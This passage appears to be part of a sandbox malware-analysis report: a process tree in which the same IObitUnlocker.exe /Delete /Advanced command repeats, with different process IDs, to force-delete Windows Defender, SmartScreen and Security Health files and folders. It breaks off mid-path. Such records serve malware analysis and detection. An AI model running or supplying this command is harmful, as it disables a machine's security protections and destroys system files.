                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:11824
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:12160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:11224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:11344
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11636
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:11924
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 